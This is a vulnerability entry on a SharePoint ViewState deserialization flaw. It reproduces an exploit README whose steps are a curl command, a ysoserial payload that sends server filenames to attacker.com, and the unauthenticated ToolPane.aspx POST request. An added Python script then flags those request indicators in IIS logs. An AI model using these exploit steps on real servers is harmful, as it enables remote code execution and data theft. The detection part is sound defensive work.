Vulnerability Information
Vulnerability name: SharePoint deserialization vulnerability
CVE ID:
Vulnerability type: Deserialization
Severity: High
Description: This vulnerability affects Microsoft SharePoint, a platform widely used for enterprise document management and collaboration. SharePoint lets teams share, manage and access information; it is typically deployed on internal corporate networks and supports a wide range of business functions. Because it is so widely deployed, the vulnerability's potential impact is broad. The vulnerability is a deserialization flaw: its technical root cause is that SharePoint does not sufficiently validate input when processing the ViewState parameter, so an attacker can craft malicious serialized data and execute arbitrary code through a specific POST request. Exploitation does not require user authentication; an attacker can launch the attack directly over the network and achieve remote code execution, which may lead to server data leakage, service disruption or other malicious actions. Since an attacker can gain full control of the system, the security risk is extremely high and remediation should be applied immediately.
Vendor: Microsoft
Product: SharePoint
Source: https://github.com/Udyz/CVE-2025-53770-Exploit
Type: CVE-2025:github search
Repository files
Source overview
CVE-2025-53770-Exploit
First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:

    curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:

    ysoserial.exe -p ViewState -g TypeConfuseDelegate \
      -c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
      --generator="<VIEWSTATE_GENERATOR>" \
      --validationkey="<VALIDATION_KEY>" \
      --validationalg="<VALIDATION_ALG>" \
      --islegacy \
      --minify
Finally, add the generated token to a POST request like this to execute the command on the server:

    POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
    Host: x.x.x.x
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Content-Length: 7699
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Referer: /_layouts/SignOut.aspx
    Connection: close

    MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
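For defenders, the request above yields a small set of log-visible indicators: an unauthenticated POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit, the extra a=/ToolPane.aspx parameter, and a Referer of /_layouts/SignOut.aspx. The following Python script is an added example written for this page, not code from the repository linked above; it parses IIS W3C extended log lines and flags entries that combine those indicators. The log excerpt embedded in it is constructed, and the field layout assumes IIS's default W3C fields with cs(Referer) and cs-username enabled.

```python
"""Triage IIS W3C logs for the ToolPane.aspx request pattern shown above.

Added example (not part of the linked repository). The log excerpt below is
constructed; the field layout follows the default IIS W3C extended format
with cs(User-Agent), cs(Referer) and cs-username logging enabled.
"""
from urllib.parse import parse_qs

# Constructed W3C extended log excerpt: not real traffic.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-20 10:01:02 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\alice 10.0.0.21 Mozilla/5.0 https://sp.example.test/ 200
2025-07-20 10:01:09 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0) /_layouts/SignOut.aspx 200
2025-07-20 10:02:30 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\bob 10.0.0.22 Mozilla/5.0 https://sp.example.test/sites/hr/default.aspx 200
2025-07-20 10:03:11 10.0.0.5 POST /_layouts/15/toolpane.aspx displaymode=edit&a=%2FToolPane.aspx 443 - 198.51.100.9 python-requests/2.31 /_layouts/SignOut.aspx 500
"""

TOOLPANE_STEM = "/_layouts/15/toolpane.aspx"
SIGNOUT_REFERER = "/_layouts/signout.aspx"


def parse_w3c(text):
    """Yield one dict per W3C extended log entry, keyed by the #Fields names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):  # skip malformed rows rather than guessing
            continue
        yield dict(zip(fields, parts))


def classify(entry):
    """Return the names of the indicators from the request above that this entry matches."""
    hits = []
    if entry.get("cs-method", "").upper() != "POST":
        return hits
    if entry.get("cs-uri-stem", "").lower() != TOOLPANE_STEM:
        return hits
    # parse_qs decodes %2F, so an encoded a=/ToolPane.aspx still matches.
    query = parse_qs(entry.get("cs-uri-query", "").lower())
    if query.get("displaymode", [""])[0] == "edit":
        hits.append("toolpane_edit_post")
    if query.get("a", [""])[0] == "/toolpane.aspx":
        hits.append("a_param_toolpane")
    if entry.get("cs(Referer)", "").lower().endswith(SIGNOUT_REFERER):
        hits.append("signout_referer")
    if entry.get("cs-username", "-") == "-":
        hits.append("unauthenticated")
    return hits


def is_suspicious(hits):
    """An edit-mode POST to ToolPane.aspx by itself is normal page-editing activity;
    flag it only when the a=/ToolPane.aspx parameter or the SignOut.aspx referer
    from the request pattern also appears."""
    return "toolpane_edit_post" in hits and (
        "a_param_toolpane" in hits or "signout_referer" in hits
    )


def scan(text):
    """Return one finding per suspicious entry, in log order."""
    findings = []
    for entry in parse_w3c(text):
        hits = classify(entry)
        if is_suspicious(hits):
            findings.append({
                "time": f"{entry['date']} {entry['time']}",
                "client": entry["c-ip"],
                "status": entry["sc-status"],
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two of the four constructed entries are flagged: the two anonymous POSTs carrying the a=/ToolPane.aspx parameter and the SignOut.aspx referer. The authenticated edit-mode POST with an ordinary site referer is left alone, which is the point of requiring more than the ToolPane.aspx path. Since the Referer header is supplied by the client, a match is a triage signal to be correlated with the response size, the client address and any follow-on activity, not proof of exploitation; the sc-status value is kept in each finding because a 500 from an unexpected deserialization path deserves the same attention as a 200.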